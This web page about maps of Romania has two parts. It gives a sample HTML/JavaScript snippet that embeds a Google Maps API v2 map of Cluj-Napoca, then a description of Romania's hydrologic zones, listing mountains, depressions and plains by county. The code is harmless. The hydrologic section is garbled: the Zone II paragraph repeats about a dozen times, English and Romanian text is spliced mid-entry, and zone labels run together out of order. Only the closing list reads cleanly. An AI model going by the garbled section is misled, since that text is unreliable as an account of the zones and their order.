Maps of Romania

Google satellite maps

Hydrologic map of Romania explained

Plotting maps of Romania and Europe by using the DISLIN package

An interactive program to plot map of Romania with localities given by geographical coordinates

Download the above interactive program (sources and database included) 0.3MB

 

Satellite maps of Romania by using the Google Maps facility

 

 

 

<HEAD>

.................
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=.....//Your key from Google here http://code.google.com/apis/maps 
        type="text/javascript"></script>

<SCRIPT type=text/javascript>
        //<![CDATA[

    function load() {
       
          if (GBrowserIsCompatible())
          {
                var map = new GMap2(document.getElementById("map"));
                map.setCenter(new GLatLng(46.756, 23.647), 6,G_HYBRID_TYPE);
                map.addControl(new GSmallMapControl());
                map.addControl(new GMapTypeControl());
               
                var point = new GLatLng(46.756, 23.647);  
                var marker = new GMarker(point);  
                GEvent.addListener(
                                  marker, "click",
                                  function() {
                                               var content = "<h1>Cluj-Napoca, Romania</h1><p>Largest town of Transylvania</p><p> 46,756ºN ; 23,647ºE </p>";    
                                                content +="<p>&nbsp; </p>";
                                                content +="<p><b>Our links: </b></p>";
                                               content += " <p><a href='http://www.academic.ro'>academic.ro</a> </p>";    
                                                content += " <p><a href='http://lichens.duci.ro'>'Lichens from Romania' portal</a> </p>";    
                                                content +="<p>&nbsp; </p>";
                                                marker.openInfoWindowHtml(content);  
                                                }
                                  );  
                map.addOverlay(marker);
               
                var map1 = new GMap2(document.getElementById("map1"));
                map1.setCenter(new GLatLng(46.756, 24.647), 5,G_MAP_TYPE);
                map1.addControl(new GSmallMapControl());
          }
        }
    //]]>

    </SCRIPT>
.............
</HEAD>

<BODY onload="load()" onunload="GUnload()">
........................


    <table width="200" border="0" align="center">
      <tr>
        <td><DIV id=map style="OVERFLOW: hidden; WIDTH: 800px; HEIGHT: 600px"></DIV>          </td>
        <td><div align="center"></div>
        <DIV id=map1 style="OVERFLOW: hidden; WIDTH: 250px; HEIGHT: 600px"></DIV></td>
      </tr>
    </table>
 ...........................
 
 </BODY>

 

 

Separator

 




Hydrologic map of Romania

 

I. High zones of the Carpathians. Highest parts of South and the Northen peaks of the Eastern Carpathians . The naturral condition correspond to low alpine(max 2500 m height); annual water flow: 1000- 1400 mm, mostly from rain and snow: 
 
 I2: (Masivului Parâng): jud. Gorj: Peak Papusa: 2136 m.; jud. Hunedoara: Peak Parângul Mare: 2519 m., Peak Cârja: 2405 m. I. High zones of the Carpathians. Highest parts of South and the Northen peaks of the Eastern Carpathians . The naturral condition correspond to low alpine(max 2500 m height); annual water flow: 1000- 1400 mm, mostly from rain and snow
 
  I 3 = (Masivului Fagaras): jud. Arges: Vârful Valea Lunga: 2254 m. alt., Lespezile: 1908 m.alt.; jud. Brasov: Vârful Moldoveanul: 2544 m. alt.; jud. Sibiu: Vârful Negoiul : 2535 m. alt.; jud. Vâlcea limita cu jud. Sibiu: Vârful Grohotisul: 2366 m. alt. I. Zona înalta a Carpatilor. Cuprinde partile cele mai înalte ale Carpatilor Meridionali si partea de nord a Carpatilor Orientali . Din punct de vedere al complexului conditiilor naturale, reprezinta partea inferioara a zonei alpine; altitudine maxima în jur de 2500 m.; scurgerea apei anuala: 1000- 1400 mm. (predominant provinenind din topirea zapezii si din ploi în timpul verii): 
 
 I 4 = (Masivului Bucegi): Vârful Omul: 2505 m. alt. (limita dintre jud. Brasov, Dâmbovita si Prahova); jud. Brasov: Vârful Bucsoiului, Poiana Morarului, Poiana Batrânilor, Diham, Valea Boiului, Valea Malaesti; jud. Dâmbovita: Zanoaga, Cheile Zanoagei, Cheile Orzii, Tatarul, Cheile Tatarului, Cheile Ialomitei; jud. Prahova: Poiana Izvorului, Gura Dihamului, Costila, Valea Cerbului, Vârful Caraiman, Piatra Arsa, Furnica, Vârful cu Dor, Babele, Brâul Mare al jepilor, Poiana Tapului, Izvorul Rece, Bucsoiu, Muntele Gâlma, Muntii Baiului: Vârful Neamtului, Vârful Câinelui. I. Zona înalta a Carpatilor. Cuprinde partile cele mai înalte ale Carpatilor Meridionali si partea de nord a Carpatilor Orientali . Din punct de vedere al complexului conditiilor naturale, reprezinta partea inferioara a zonei alpine; altitudine maxima în jur de 2500 m.; scurgerea apei anuala: 1000- 1400 mm. (predominant provinenind din topirea zapezii si din ploi în timpul verii): 
 
 I 5 = (Masivului Rodnei): Vârful Batrâna (limita dintre jud. Bistrita- Nasaud si Maramures); jud. Bistrita-Nasaud: Vârful Ineul (2279 m. alt.), Lacul Lala, Vârful Tapului, Muntele Paltin, Muntele Corongis, Rodna Veche, Valea Vinului, Valea Rebra; jud. Maramures: Vârful Pietrosul: (2303 m. alt.). I. Zona înalta a Carpatilor. Cuprinde partile cele mai înalte ale Carpatilor Meridionali si partea de nord a Carpatilor Orientali . Din punct de vedere al complexului conditiilor naturale, reprezinta partea inferioara a zonei alpine; altitudine maxima în jur de 2500 m.; scurgerea apei anuala: 1000- 1400 mm. (predominant provinenind din topirea zapezii si din ploi în timpul verii): 

  I 1 = (Masivului Retezat- jud. Hunedoara): Vârful Peleaga: 2509 m. alt., Vârful Papusa: 2508 m. alt., Vârful Retezat: 2482 m. alt., Vârful Bucura: 2433 m., Parcul National Retezat: 2074 m. alt. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. IV = Zona estica a Carpatilor Orientali. Se caracterizeaza prin alimentare pluviala intensa a râurilor, prin predominarea apelor mari de primavara si viituri frecvente în timpul verii si uneori al toamnei; datorita alimentarii subterane intense, scurgerea în perioada secetoasa si în intervalele dintre viituri este ridicata. Teritorial cuprinde: jud. Bacau: Muntii Nemirei, Culmea Pietricicai, Muntii Ciucului, Muntii Berzunti, Depresiunea Tazlau, Subcarpatii Moldovei; jud. Neamt: Muntii Tarcaului, Muntii Gosmanului, Muntele Ceahlau, Muntii Stânisoarei, Subcarpatii Moldovei; jud. Suceava: Obcina Brodinei, Obcina Mare, Podisul Sucevei, Depresiunea Radauti, Podisul Dragomirnei, Culoarul Siretului, Muntii Suhardului, Depresiunea Dornelor, Obcina Mestecanisului, Obcina Feredeului, Obcina Mare, Muntele Giumalau, Muntele Rarau; jud. Vrancea: Muntii Vrancei, Subcarpatii Vrancei. II = Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov: Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei; jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu; jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii. IV = Zona estica a Carpatilor Orientali. Se caracterizeaza prin alimentare pluviala intensa a râurilor, prin predominarea apelor mari de primavara si viituri frecvente în timpul verii si uneori al toamnei; datorita alimentarii subterane intense, scurgerea în perioada secetoasa si în intervalele dintre viituri este ridicata. Teritorial cuprinde: jud. Bacau: Muntii Nemirei, Culmea Pietricicai, Muntii Ciucului, Muntii Berzunti, Depresiunea Tazlau, Subcarpatii Moldovei; jud. Neamt: Muntii Tarcaului, Muntii Gosmanului, Muntele Ceahlau, Muntii Stânisoarei, Subcarpatii Moldovei; jud. Suceava: Obcina Brodinei, Obcina Mare, Podisul Sucevei, Depresiunea Radauti, Podisul Dragomirnei, Culoarul Siretului, Muntii Suhardului, Depresiunea Dornelor, Obcina Mestecanisului, Obcina Feredeului, Obcina Mare, Muntele Giumalau, Muntele Rarau; jud. Vrancea: Muntii Vrancei, Subcarpatii Vrancei. III = Zona Carpatica din estul si vestul Transilvaniei: se caracterizeaza prin alimentare bogata a râurilor cu ape provenite din ploi, scurgerea apei ridicata; include Muntii Apuseni si vestul Carpatilor Orientali: 

  III 1 = Partea vestica a Carpatilor Orientali: jud. Bistrita- Nasaud: Muntii Bârgaului; jud. Covasna: Muntii Intorsurii, Muntii Bodoc, Muntii Baraolt; jud. Harghita: Muntii Harghita, Depresiunea Ciucului, Muntii Giurgeului, Depresiunea Giurgeului, Muntii Ciucului; jud. Maramures: Muntii Ignisului, Depresiunea Maramuresului, Muntii Maramuresului; jud. Mures: Muntii Calimani, Muntii Gurghiului, Subcarpatii Transilvaniei; jud. Satu- Mare: Muntii Oasului, Depresiunea Oasului. III = Zona Carpatica din estul si vestul Transilvaniei: se caracterizeaza prin alimentare bogata a râurilor cu ape provenite din ploi, scurgerea apei ridicata; include Muntii Apuseni si vestul Carpatilor Orientali:
 
  III 2 = Muntii Apuseni: jud. Alba: Muntii Trascaului, Depresiunea Câmpeni; jud. Arad: Muntii Zarandului, Depresiunea Zarandului; jud. Bihor: Muntii Padurea Craiului, Muntii Bihorului, Muntii Codru-Moma; jud. Cluj: Masivul Vladeasa, Muntii Gilau- Muntele Mare; jud. Hunedoara: Depresiunea Brad- Halmagiu, Muntii Metaliferi, jud. Salaj: Muntii Meses; V = Zona Carpatica si Subcarpatica din Nord-Vestul Olteniei. Se caracterizeaza prin încalziri frecvente ale aerului în timpul iernii, din care cauza scurgerea în acest anotimp este mai ridicata decât în cursul verii. Teritorial cuprinde: jud. Mehedinti: Podisul Mehedinti, Muntii Mehedinti, Muntii Almajului. VI = Zona Muntilor Banatului. Are multe trasaturi comune cu zona V, însa viiturile din timpul iernii, provenite exclusiv din ploi, sunt mult mai frecvente; în aceasta zona se reflecta cel mai bine particularitatile regimului hidrologic mediteranean; alimentare subterana ridicata, izvoarele carstice destul de numeroase. Teritorial cuprinde: jud. Caras- Severin: Muntii Poiana Ruscai, Muntii Tarcului, Muntii Cernei, Depresiunea Caransebes, Muntii Semenic, Muntii Aninei, Muntii Docnecei, Muntii Locvei, Muntii Aninei, Depresiunea Almajului. VII = Zona piemontana sudica. Se caracterizeaza prin ape mari de primavara si viituri în timpul iernii si verii; se deosebeste de celelalte zone prin conditii variabile ale alimentarii subterane a râurilor care sunt legate de particularitatile structurii geologice si de adâncimea vaii râurilor; o mare parte a râurilor seaca atât vara cât si iarna. Teritorial cuprinde: jud. Arges: Muscelele Argesului, Piemontul Cotmenei, Gruiurile Argesului, Piemontul Cândesti; jud. Dâmbovita: Piemontul Cândesti; jud. Gorj: Gruiurile Jiului; jud. Mehedinti: Piemontul Motrului, Podisul Balacitei; jud. Olt: Piemontul Cotmenei; jud. Vâlcea: Piemontul Oltetului. VIII = Zona Podisului Moldovei. Se caracterizeaza prin regim hidrologic continental mai accentuat decât în celelalte zone, exprimat prin ape mari de primavara si viituri pluviale intense în timpul verii si toamnei. Teritorial cuprinde: jud. Bacau: Colinele Tutovei, Colinele Falciului, jud. Botosani: Câmpia Moldovei, jud. Galati: Câmpia Tecuciului, Câmpia Covârluiului, Podisul Covârluiului; jud. Iasi: Dealul Mare, Câmpia Moldovei, Podisul Central Moldovenesc, Colinele Tutovei; jud. Suceava: Podisul Sucevei; jud. Vaslui: Podisul Central Moldovenesc, Colinele Tutovei, Colinele Falciului; jud. Vrancea: Dealurile Susitei, Colinele Tutovei, Dealurile Milcovului. IX = Zona Câmpiei Române si Dobrogei: regimul hidrologic al râurilor instabil, cu viituri pluviale în tot timpul anului si cu ape mari primavara provenite exclusiv din topirea zapezii; apele subterane au un aport destul de slab în alimentarea râurilor; predomina alimentarea prin zapada si ploaie:
 
  IX 1= Câmpia Româna . Teritorial cuprinde: jud. Braila: Câmpia Brailei, Câmpia Siretului Inferior, Balta Brailei; jud. Buzau: Câmpia Râmnicului; jud. Dâmbovita: Câmpia Târgoviste- Ploiesti, Câmpia Titu; jud. Dolj: Câmpia Olteniei, Câmpia Desnatuiului, Lunca Dunarii; jud. Ialomita: Baraganul Ialomitei, Balta Ialomitei, jud. Ilfov: Câmpia Vlasiei, Câmpia Mostistei; jud. Mehedinti: Câmpia Blahnitei; jud. Olt: Câmpia Boian; jud. Prahova: Câmpia Saratei; jud. Teleorman: Câmpia Gavanu- Burdea, Câmpia Boian. IX = Zona Câmpiei Române si Dobrogei: regimul hidrologic al râurilor instabil, cu viituri pluviale în tot timpul anului si cu ape mari primavara provenite exclusiv din topirea zapezii; apele subterane au un aport destul de slab în alimentarea râurilor; predomina alimentarea prin zapada si ploaie: 
 
 IX 2= Dobrogea. Teritorial cuprinde: jud. Constanta: Podisul Dobrogei de Sud, Podisul Casimcei; jud. Tulcea: Muntii Macinului (Culmea Pricopan: 370 m. alt), Podisul Niculitel, Dealurile Tulcei, Podisul Dobrogei de Nord, Podisul Babadagului.  X= Zona piemonturilor vestice si a Câmpiei Tisei. Regimul hidrologic al râurilor se caracterizeaza prin viituri pluvio-nivale din timpul iernii, ape mari de primavara si viituri pluviale vara si toamna; apele subterane au aport slab în alimentarea râurilor. Teritorial cuprinde: jud. Arad: Câmpia Muresului, Podisul Lipovei; jud. Bihor: Dealurile Tasadului, Câmpia Crisurilor, Dealurile Oradei; jud. Caras- Severin: Depresiunea Carasului, Dealurile Oravitei, Dealurile Poganisului; jud. Satu-Mare: Câmpia Somesului; jud. Timis: Câmpia Timisului, Câmpia Bârzavei, Dealurile Buziasului, Câmpia Vingai, Câmpia Arancai. XI= Zona Bazinului Transilvaniei. Regimul râurilor se caracterizeaza prin ape mari de primavara nivo- pluviale si viituri pluviale vara si toamna; alimentarea subterana a râurilor este redusa Teritorial cuprinde: jud. Alba: Podisul Secaselor; jud. Bistrita-Nasaud: Câmpia Transilvaniei, Dealurile Bistritei, Dealurile Nasaudului; jud. Brasov: Depresiunea Fagarasului; jud. Cluj: Câmpia Transilvaniei, Câmpia Fizesului, Podisul Somesan, Dealurile Feleacului; jud. Maramures: Dealurile Chioarului; jud. Mures: Dealurile Târnavei Mici, Câmpia Sarmasului, Podisul Târnavelor; jud. Mures: Câmpia Sarmasului, Podisul Târnavelor; jud. Salaj: Podisul Somesan, Podisul Boiului , Dealurile Salajului; jud. Sibiu: Podisul Târnavelor, Podisul Hârtibaciului.

 

I =     Zona înalta a Carpatilor. Cuprinde partile cele mai înalte ale Carpatilor Meridionali  si partea de nord a Carpatilor Orientali . Din punct de vedere al complexului conditiilor naturale, reprezinta partea inferioara a zonei alpine; altitudine maxima în jur de  2500 m.;  scurgerea apei anuala: 1000- 1400 mm. (predominant provinenind din topirea zapezii si din ploi în timpul verii):
I 1 =     (Masivului Retezat- jud. Hunedoara): Vârful Peleaga: 2509 m. alt., Vârful Papusa: 2508 m. alt., Vârful Retezat: 2482 m. alt., Vârful Bucura: 2433 m., Parcul National Retezat: 2074 m. alt.
I 2 =     (Masivului Parâng): jud. Gorj: Vârful Papusa: 2136 m. alt.; jud. Hunedoara: Vf. Parângul Mare: 2519 m. alt., Vârful Cârja: 2405 m. alt.
I 3 =     (Masivului Fagaras): jud. Arges: Vârful Valea Lunga: 2254 m. alt., Lespezile: 1908 m.alt.; jud. Brasov: Vârful Moldoveanul: 2544 m. alt.; jud. Sibiu: Vârful Negoiul : 2535 m. alt.; jud. Vâlcea limita cu jud. Sibiu: Vârful Grohotisul: 2366 m. alt.
I 4 =     (Masivului Bucegi): Vârful Omul: 2505 m. alt. (limita dintre jud. Brasov, Dâmbovita si Prahova); jud. Brasov: Vârful Bucsoiului, Poiana Morarului, Poiana Batrânilor, Diham, Valea Boiului, Valea Malaesti; jud. Dâmbovita: Zanoaga, Cheile Zanoagei, Cheile Orzii, Tatarul, Cheile Tatarului, Cheile Ialomitei; jud. Prahova: Poiana Izvorului, Gura Dihamului, Costila, Valea Cerbului, Vârful Caraiman, Piatra Arsa, Furnica, Vârful cu Dor, Babele, Brâul Mare al jepilor, Poiana Tapului, Izvorul Rece, Bucsoiu, Muntele Gâlma, Muntii Baiului: Vârful Neamtului, Vârful Câinelui.  
I 5 =     (Masivului Rodnei): Vârful Batrâna (limita dintre jud. Bistrita- Nasaud si Maramures); jud. Bistrita-Nasaud: Vârful Ineul (2279 m. alt.), Lacul Lala, Vârful Tapului, Muntele Paltin, Muntele Corongis, Rodna Veche, Valea Vinului, Valea Rebra; jud. Maramures: Vârful Pietrosul: (2303 m. alt.).  
